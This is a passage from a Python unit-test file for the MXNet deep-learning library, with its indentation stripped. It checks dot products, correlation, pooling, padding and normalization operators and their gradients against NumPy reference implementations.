# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c._simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, dtype=outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, dtype=exe_add.outputs[0].dtype, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1._simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = False, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 0,pad_size = 5,is_multiply = True, dtype = dtype)
with pytest.raises(MXNetError):
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 0,stride2 = 1,pad_size = 4,is_multiply = True, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y._bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
